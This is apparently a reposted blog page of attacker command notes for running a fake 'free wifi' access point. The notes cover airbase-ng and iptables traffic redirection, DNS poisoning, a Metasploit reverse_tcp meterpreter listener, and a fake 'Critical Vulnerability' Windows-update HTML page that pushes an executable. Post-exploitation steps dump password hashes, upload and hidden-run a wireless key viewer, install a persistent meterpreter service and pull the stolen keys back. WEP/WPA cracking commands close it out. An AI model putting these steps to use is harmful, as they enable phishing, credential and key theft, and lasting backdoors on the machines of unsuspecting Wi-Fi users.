Commands for fake AP
dhclient wlan0 //// Connect to the internet, can be eth0
*****Setup metasploit listener********* ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places https://ift.tt/2ja8bNN
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
show options
exploit
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here
*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = route to the internet
/etc/init.d/dhcp3-server restart // backtrack users use dhcpd
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page
**********************************************************************
direct any request to apache
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************
NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v
su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
cd / /// dnspoison available at https://ift.tt/2mCrsaA
cd home
cd hm
cd Desktop
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1
****************************************************************************
**** Check for victims ********
arp -n -v -i at0
session - l
session -i
sysinfo
getuid
use priv
hashdump
***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
execute -H -f wkv.bat
cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt
misc......
wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service
Index html -
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://ift.tt/kkyg93">
<html xmlns="https://ift.tt/lH0Osb">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #999999;
}
.style3 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
}
.style4 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>
####################
ifconfig rausb0 up
airodump-ng -w capture -c 6 rausb0
aireplay-ng -O 10 -a <mac access point> -c <mac client> rausb0
-O ->deauthenticate attack
aireplay-nh -3 -b <mac access point> -h <mac client> rausb0
-3 ->arp request
aircrack capture02.cap
##################
aircrack-ng -a 2 filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note.You must capture full cap files with airodump-ng (which means without --ivs option), not just IVs
------------------
Have you tried to manually connect to your AP?
iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 key <whatever the key is> (if you have WEP turned on)
ifconfig eth0 up
Try that, give it a minute or 2 and then run iwconfig again and post your results.
##################
from BITCOIN NEWS https://ift.tt/2LzPkVO
via Bitcoin News Update
Monday, May 28, 2018
Commands for fake AP
Date - May 28, 2018
Bitcoin News
Share this
Related Articles :
Paling Dilihat
-
Three stories dominate this week’s initial coin offering (ICO) round up: It appears many ICO projects are reaching out to social media infl...
-
from BITCOIN NEWS http://bit.ly/2BAgGb6 via Bitcoin News Update
-
Google hacking master list Dan Morrill (Program Director CityU of Seattle) posted 11/14/2008 | Comments (2) This master list of Google Ha...